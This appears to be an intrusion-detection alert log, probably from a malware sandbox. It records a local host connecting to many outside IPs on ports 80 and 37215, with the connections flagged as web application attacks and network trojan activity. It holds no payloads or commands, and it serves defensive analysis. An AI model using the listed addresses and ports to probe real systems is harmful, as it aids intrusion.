      Timestamp:192.168.2.23209.197.111.10941628802030092 07/19/22-13:07:18.775979
      SID:2030092
      Source Port:41628
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.252.159.17443504802030092 07/19/22-13:08:37.501485
      SID:2030092
      Source Port:43504
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23173.39.254.9633510802030092 07/19/22-13:08:45.473835
      SID:2030092
      Source Port:33510
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.195.121.8547410802030092 07/19/22-13:08:45.641804
      SID:2030092
      Source Port:47410
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.52.153.4433792802030092 07/19/22-13:07:59.623028
      SID:2030092
      Source Port:33792
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.144.211.13649598802030092 07/19/22-13:08:23.360992
      SID:2030092
      Source Port:49598
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.38.0.21534796802030092 07/19/22-13:08:32.475220
      SID:2030092
      Source Port:34796
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23173.234.127.13254298802030092 07/19/22-13:07:27.959226
      SID:2030092
      Source Port:54298
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2380.96.102.5659096802030092 07/19/22-13:08:45.332416
      SID:2030092
      Source Port:59096
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2381.140.234.7547018802030092 07/19/22-13:08:48.409035
      SID:2030092
      Source Port:47018
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.149.208.21150096802030092 07/19/22-13:07:22.160105
      SID:2030092
      Source Port:50096
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23186.6.8.2444962802030092 07/19/22-13:08:41.704157
      SID:2030092
      Source Port:44962
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23194.59.205.18542490802030092 07/19/22-13:08:17.594307
      SID:2030092
      Source Port:42490
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23185.80.55.3942600802030092 07/19/22-13:07:00.285636
      SID:2030092
      Source Port:42600
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.255.54.19943568802030092 07/19/22-13:07:17.266916
      SID:2030092
      Source Port:43568
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.222.18.3547602802030092 07/19/22-13:08:54.091171
      SID:2030092
      Source Port:47602
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23202.64.13.9138198802030092 07/19/22-13:07:51.068239
      SID:2030092
      Source Port:38198
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2384.54.129.13756718802030092 07/19/22-13:08:28.859280
      SID:2030092
      Source Port:56718
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.77.35.12254644802030092 07/19/22-13:08:52.297635
      SID:2030092
      Source Port:54644
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23161.49.25.858448802030092 07/19/22-13:07:33.214868
      SID:2030092
      Source Port:58448
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.226.67.8659782802030092 07/19/22-13:08:37.911775
      SID:2030092
      Source Port:59782
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23117.207.183.21948990802030092 07/19/22-13:08:08.723664
      SID:2030092
      Source Port:48990
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23195.123.127.16943640802030092 07/19/22-13:07:01.018442
      SID:2030092
      Source Port:43640
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.9.5835910372152835222 07/19/22-13:08:15.592752
      SID:2835222
      Source Port:35910
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.226.127.16145486372152835222 07/19/22-13:08:37.809105
      SID:2835222
      Source Port:45486
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2323.201.78.21835980802030092 07/19/22-13:08:12.531024
      SID:2030092
      Source Port:35980
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.74.22347448372152835222 07/19/22-13:08:38.261495
      SID:2835222
      Source Port:47448
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2378.46.9.5238066802030092 07/19/22-13:08:28.825754
      SID:2030092
      Source Port:38066
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2364.77.109.21459568802030092 07/19/22-13:08:45.603555
      SID:2030092
      Source Port:59568
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.203.102.24757660802030092 07/19/22-13:08:03.779181
      SID:2030092
      Source Port:57660
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2380.62.237.24644454802030092 07/19/22-13:08:31.686731
      SID:2030092
      Source Port:44454
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.168.123.22952492802030092 07/19/22-13:08:12.664353
      SID:2030092
      Source Port:52492
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.201.36.14651658802030092 07/19/22-13:08:49.714144
      SID:2030092
      Source Port:51658
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2343.231.9.1157302802030092 07/19/22-13:08:27.322597
      SID:2030092
      Source Port:57302
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2337.13.10.14148110802030092 07/19/22-13:07:30.696809
      SID:2030092
      Source Port:48110
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.252.102.10647670802030092 07/19/22-13:08:31.645446
      SID:2030092
      Source Port:47670
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23143.204.54.7955544802030092 07/19/22-13:07:33.595119
      SID:2030092
      Source Port:55544
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.48.22859084372152835222 07/19/22-13:08:31.293897
      SID:2835222
      Source Port:59084
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.244.76.20157506372152835222 07/19/22-13:07:46.276918
      SID:2835222
      Source Port:57506
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2385.38.60.16243492802030092 07/19/22-13:08:15.696618
      SID:2030092
      Source Port:43492
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2341.175.50.10743150802030092 07/19/22-13:08:23.621435
      SID:2030092
      Source Port:43150
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23122.11.174.3142008802030092 07/19/22-13:08:42.714699
      SID:2030092
      Source Port:42008
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.215.86.23847000802030092 07/19/22-13:07:30.255975
      SID:2030092
      Source Port:47000
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.83.17240834372152835222 07/19/22-13:08:37.977030
      SID:2835222
      Source Port:40834
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23184.50.140.10158644802030092 07/19/22-13:07:00.588083
      SID:2030092
      Source Port:58644
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23103.224.99.15159182802030092 07/19/22-13:08:03.762711
      SID:2030092
      Source Port:59182
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2381.128.180.22935520802030092 07/19/22-13:08:28.839435
      SID:2030092
      Source Port:35520
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23183.96.177.8154712802030092 07/19/22-13:08:38.047371
      SID:2030092
      Source Port:54712
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2364.59.72.1853726802030092 07/19/22-13:07:18.416626
      SID:2030092
      Source Port:53726
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.104.20060482372152835222 07/19/22-13:08:08.354000
      SID:2835222
      Source Port:60482
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23218.188.102.23235270802030092 07/19/22-13:07:41.586193
      SID:2030092
      Source Port:35270
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.234.14.12758978802030092 07/19/22-13:07:44.139149
      SID:2030092
      Source Port:58978
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.95.9333208372152835222 07/19/22-13:08:23.655112
      SID:2835222
      Source Port:33208
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23170.130.4.8834920802030092 07/19/22-13:08:42.687912
      SID:2030092
      Source Port:34920
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.48.6.2542424802030092 07/19/22-13:07:22.784862
      SID:2030092
      Source Port:42424
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23147.135.192.4555186802030092 07/19/22-13:08:56.449261
      SID:2030092
      Source Port:55186
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23164.88.173.6944316802030092 07/19/22-13:07:41.564573
      SID:2030092
      Source Port:44316
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2380.151.226.22446776802030092 07/19/22-13:08:09.492337
      SID:2030092
      Source Port:46776
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.232.18.202.5259926802030092 07/19/22-13:08:59.728269
      SID:2030092
      Source Port:59926
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.88.20.1749076802030092 07/19/22-13:08:12.448336
      SID:2030092
      Source Port:49076
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.227.174.4860454802030092 07/19/22-13:08:32.562556
      SID:2030092
      Source Port:60454
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23103.140.67.18549382802030092 07/19/22-13:08:31.842337
      SID:2030092
      Source Port:49382
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23177.124.0.10649316802030092 07/19/22-13:08:54.127050
      SID:2030092
      Source Port:49316
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23213.219.175.11447986802030092 07/19/22-13:07:00.304726
      SID:2030092
      Source Port:47986
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2324.194.192.22545856802030092 07/19/22-13:07:42.026466
      SID:2030092
      Source Port:45856
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.199.17.433608802030092 07/19/22-13:08:08.689244
      SID:2030092
      Source Port:33608
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.38.83.12054552802030092 07/19/22-13:07:55.586629
      SID:2030092
      Source Port:54552
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2395.216.181.15842198802030092 07/19/22-13:08:20.566492
      SID:2030092
      Source Port:42198
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.59.69.8147628802030092 07/19/22-13:07:00.279576
      SID:2030092
      Source Port:47628
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.152.219.23643298802030092 07/19/22-13:07:52.962768
      SID:2030092
      Source Port:43298
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.234.14.24555854802030092 07/19/22-13:07:27.816330
      SID:2030092
      Source Port:55854
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.189.21541524802030092 07/19/22-13:07:33.387370
      SID:2030092
      Source Port:41524
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23145.239.66.14849892802030092 07/19/22-13:07:33.559800
      SID:2030092
      Source Port:49892
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.81.240.9455618802030092 07/19/22-13:08:27.113462
      SID:2030092
      Source Port:55618
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23162.243.70.12142398802030092 07/19/22-13:07:33.341204
      SID:2030092
      Source Port:42398
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23186.7.130.15141998802030092 07/19/22-13:07:47.826498
      SID:2030092
      Source Port:41998
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.46.137.23041230802030092 07/19/22-13:07:19.108938
      SID:2030092
      Source Port:41230
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.50.69.23551170802030092 07/19/22-13:07:22.605062
      SID:2030092
      Source Port:51170
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.54.203.24734602802030092 07/19/22-13:08:28.975858
      SID:2030092
      Source Port:34602
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.215.11.20133166802030092 07/19/22-13:08:27.031412
      SID:2030092
      Source Port:33166
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2340.84.38.7456672802030092 07/19/22-13:08:26.900500
      SID:2030092
      Source Port:56672
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23163.152.218.20047836802030092 07/19/22-13:07:42.092674
      SID:2030092
      Source Port:47836
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23216.239.140.6250732802030092 07/19/22-13:08:16.030870
      SID:2030092
      Source Port:50732
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23217.21.47.8960546802030092 07/19/22-13:08:42.595929
      SID:2030092
      Source Port:60546
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.252.4.845926802030092 07/19/22-13:08:52.491316
      SID:2030092
      Source Port:45926
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.225.159.4836014372152835222 07/19/22-13:07:44.112197
      SID:2835222
      Source Port:36014
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2318.231.19.23060394802030092 07/19/22-13:07:55.565427
      SID:2030092
      Source Port:60394
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.154.216.3355266802030092 07/19/22-13:07:55.388466
      SID:2030092
      Source Port:55266
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2381.83.10.3642398802030092 07/19/22-13:07:26.058801
      SID:2030092
      Source Port:42398
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.126.14644134372152835222 07/19/22-13:07:23.246522
      SID:2835222
      Source Port:44134
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23138.68.166.25439380802030092 07/19/22-13:07:31.954071
      SID:2030092
      Source Port:39380
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.238.49.8550584372152835222 07/19/22-13:08:21.160229
      SID:2835222
      Source Port:50584
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23104.117.231.10657896802030092 07/19/22-13:07:30.542803
      SID:2030092
      Source Port:57896
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2351.15.156.3148692802030092 07/19/22-13:07:39.005909
      SID:2030092
      Source Port:48692
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.196.204.23751622802030092 07/19/22-13:08:20.388755
      SID:2030092
      Source Port:51622
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2392.205.17.24646564802030092 07/19/22-13:07:58.272504
      SID:2030092
      Source Port:46564
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.42.15738752372152835222 07/19/22-13:08:33.802184
      SID:2835222
      Source Port:38752
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2392.205.95.2543432802030092 07/19/22-13:08:38.229039
      SID:2030092
      Source Port:43432
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.205.30.357056802030092 07/19/22-13:07:18.610028
      SID:2030092
      Source Port:57056
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23146.59.178.10951872802030092 07/19/22-13:07:37.089654
      SID:2030092
      Source Port:51872
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.248.235.9444120802030092 07/19/22-13:08:31.823774
      SID:2030092
      Source Port:44120
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.171.175.20754872802030092 07/19/22-13:07:58.295278
      SID:2030092
      Source Port:54872
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.13.15956984372152835222 07/19/22-13:08:35.880974
      SID:2835222
      Source Port:56984
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2335.173.158.11157296802030092 07/19/22-13:07:22.039582
      SID:2030092
      Source Port:57296
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.109.12752034372152835222 07/19/22-13:08:47.155468
      SID:2835222
      Source Port:52034
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23108.21.128.24154434802030092 07/19/22-13:07:39.076050
      SID:2030092
      Source Port:54434
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.11.23636062372152835222 07/19/22-13:08:09.999688
      SID:2835222
      Source Port:36062
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23104.102.14.12645990802030092 07/19/22-13:08:56.420789
      SID:2030092
      Source Port:45990
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23193.86.132.9845472802030092 07/19/22-13:07:00.345440
      SID:2030092
      Source Port:45472
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2363.246.135.1138456802030092 07/19/22-13:08:37.790333
      SID:2030092
      Source Port:38456
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.100.80.11651350802030092 07/19/22-13:08:37.511760
      SID:2030092
      Source Port:51350
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.106.7644312372152835222 07/19/22-13:08:55.682436
      SID:2835222
      Source Port:44312
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23154.17.18.12740602802030092 07/19/22-13:08:56.892431
      SID:2030092
      Source Port:40602
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.206.95.21759254802030092 07/19/22-13:07:46.855173
      SID:2030092
      Source Port:59254
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.60.141.6940672802030092 07/19/22-13:08:12.734610
      SID:2030092
      Source Port:40672
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23142.132.170.18655812802030092 07/19/22-13:07:47.595110
      SID:2030092
      Source Port:55812
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2368.178.190.1842252802030092 07/19/22-13:07:22.592687
      SID:2030092
      Source Port:42252
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23135.181.161.5849710802030092 07/19/22-13:08:08.562408
      SID:2030092
      Source Port:49710
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.72.43.6142546802030092 07/19/22-13:08:31.918735
      SID:2030092
      Source Port:42546
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2346.37.26.10147900802030092 07/19/22-13:07:21.789013
      SID:2030092
      Source Port:47900
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.80.16.17955522802030092 07/19/22-13:08:20.542245
      SID:2030092
      Source Port:55522
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.106.25554366372152835222 07/19/22-13:08:05.883721
      SID:2835222
      Source Port:54366
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23104.75.122.20450278802030092 07/19/22-13:08:08.887692
      SID:2030092
      Source Port:50278
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.76.155.14341002802030092 07/19/22-13:08:42.701867
      SID:2030092
      Source Port:41002
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.149.154.6955792802030092 07/19/22-13:07:59.834346
      SID:2030092
      Source Port:55792
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.120.217.9133700802030092 07/19/22-13:08:32.510397
      SID:2030092
      Source Port:33700
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23185.182.76.16237476802030092 07/19/22-13:08:42.606838
      SID:2030092
      Source Port:37476
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.32.144.18141284802030092 07/19/22-13:08:41.638460
      SID:2030092
      Source Port:41284
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23203.178.142.14044420802030092 07/19/22-13:08:45.583655
      SID:2030092
      Source Port:44420
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23178.114.177.20143874802030092 07/19/22-13:08:45.619585
      SID:2030092
      Source Port:43874
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23213.168.70.4633048802030092 07/19/22-13:07:18.574597
      SID:2030092
      Source Port:33048
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.87.76.6553414802030092 07/19/22-13:07:00.393440
      SID:2030092
      Source Port:53414
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.7.34.4455254802030092 07/19/22-13:08:42.842134
      SID:2030092
      Source Port:55254
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.119.244.13537394802030092 07/19/22-13:08:27.096655
      SID:2030092
      Source Port:37394
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2380.65.56.16650252802030092 07/19/22-13:07:30.630124
      SID:2030092
      Source Port:50252
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23181.214.234.18546720802030092 07/19/22-13:08:12.733960
      SID:2030092
      Source Port:46720
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2343.154.93.344562802030092 07/19/22-13:07:26.315281
      SID:2030092
      Source Port:44562
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.225.11.23452202802030092 07/19/22-13:07:00.445863
      SID:2030092
      Source Port:52202
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.34.236.7043860802030092 07/19/22-13:08:56.581578
      SID:2030092
      Source Port:43860
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23206.237.233.11337928802030092 07/19/22-13:07:22.302153
      SID:2030092
      Source Port:37928
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.13.132.15857102802030092 07/19/22-13:08:59.250189
      SID:2030092
      Source Port:57102
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.243.241.14636816802030092 07/19/22-13:07:51.020303
      SID:2030092
      Source Port:36816
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23178.32.165.19148036802030092 07/19/22-13:07:08.452033
      SID:2030092
      Source Port:48036
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2394.130.254.15948624802030092 07/19/22-13:08:31.688737
      SID:2030092
      Source Port:48624
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2317.253.5.3334008802030092 07/19/22-13:07:00.433002
      SID:2030092
      Source Port:34008
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.97.153.10556418802030092 07/19/22-13:08:37.286155
      SID:2030092
      Source Port:56418
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.46.4845704372152835222 07/19/22-13:07:00.433704
      SID:2835222
      Source Port:45704
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23108.158.242.8657310802030092 07/19/22-13:08:20.647880
      SID:2030092
      Source Port:57310
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23188.166.175.22737544802030092 07/19/22-13:08:31.678854
      SID:2030092
      Source Port:37544
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.165.143.9944036802030092 07/19/22-13:07:00.590360
      SID:2030092
      Source Port:44036
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2368.65.123.17235344802030092 07/19/22-13:08:37.556755
      SID:2030092
      Source Port:35344
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.199.131.21242624802030092 07/19/22-13:08:12.593866
      SID:2030092
      Source Port:42624
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2346.20.73.18958806802030092 07/19/22-13:07:30.718644
      SID:2030092
      Source Port:58806
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.204.193.735108802030092 07/19/22-13:08:52.527591
      SID:2030092
      Source Port:35108
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2320.232.83.347890802030092 07/19/22-13:07:21.858188
      SID:2030092
      Source Port:47890
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.245.33.19850192372152835222 07/19/22-13:07:28.048080
      SID:2835222
      Source Port:50192
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2380.64.65.8235400802030092 07/19/22-13:08:45.360399
      SID:2030092
      Source Port:35400
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.66.17457322372152835222 07/19/22-13:08:47.436162
      SID:2835222
      Source Port:57322
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2354.251.166.21249998802030092 07/19/22-13:07:47.259987
      SID:2030092
      Source Port:49998
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2385.17.194.16538044802030092 07/19/22-13:08:02.024795
      SID:2030092
      Source Port:38044
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2317.248.207.1146268802030092 07/19/22-13:08:15.765696
      SID:2030092
      Source Port:46268
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23208.219.20.19336250802030092 07/19/22-13:08:56.500394
      SID:2030092
      Source Port:36250
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
